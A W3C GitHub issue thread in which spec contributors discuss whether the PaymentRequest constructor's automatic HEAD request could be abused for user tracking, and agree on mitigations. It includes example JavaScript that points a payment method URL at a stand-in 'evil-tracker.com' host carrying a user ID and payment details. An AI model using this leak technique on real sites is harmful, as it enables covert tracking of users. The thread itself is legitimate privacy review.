### ISSUE TITLE
Could JIT be used to track users?

### ISSUE THREAD

**Issue by marcoscaceres** [w3c/webpayments-payment-apps-api#334]
Given:
 
```JS
const methodData = [
  {
    supportedMethods: "https://evil-tracker.com/?userid=123",
  },
];
const details = {
  total: {
    label: "Total due",
    amount: { currency: "USD", value: "0.0" },
  },
};
new PaymentRequest(methodData, details);
```

The above sends a HEAD request when the constructor is called. 

This means that one can do:

```JS
const methodData = [
 // Leak stuff... not a real payment handler
 {
    supportedMethods: `https://evil-tracker.com/?userid=123&displayItems=${details.diplayItems}`,
  },
 {
    supportedMethods: "basic-card"
 }
];
```

I wonder if for URL based payment method identifiers we should allow any URL structure, but only allow HEAD requests to `new URL(./well-known/payment-handler.json, handlerOrigin)` with a restricted referrer policy and everything stripped?

**Comment by marcoscaceres** [comment]
Updated the above... mentioned that a HEAD request is immediately made when PaymentRequest is constructed.

**Comment by rsolomakhin** [comment]
Is this very different from:

```html
<iframe src="https://evil-tracker.com/?userid=123&displayItems=${details.diplayItems}">
```

**Comment by ianbjacobs** [comment]
@marcoscaceres, can you explain the role of the HEAD request? Also: is this implementation specific? Do all implementations do this?

**Comment by rsolomakhin** [comment]
@ianbjacobs : That's Chrome looking for payment handler information at the payment method URL.

**Comment by marcoscaceres** [comment]
The HEAD request’s role I think is defined in the payment manifest spec. 

I guess the difference with the iframe is that the iframe is designed to load content. It seems like an unusual side effect that construction of a JS object would trigger a network request.

**Comment by ianbjacobs** [comment]
Got it, so this is part of the Payment Method Manifest fetching algo [1].

I support a "reduced URL" proposal for this part of the algorithm.

Ian


[1] https://w3c.github.io/payment-method-manifest/#fetch-pmm

**Comment by marcoscaceres** [comment]
FWIW, I think the JIT idea is really awesome. Just want to make sure it’s hard to abuse.

**Comment by rsolomakhin** [comment]
"Reduced URL, restricted referrer policy, and everything stripped" ideas sound good to me.

**Comment by ianbjacobs** [comment]
Closing this issue since moved to Payment Method Manifest spec:
 https://github.com/w3c/payment-method-manifest/issues/33
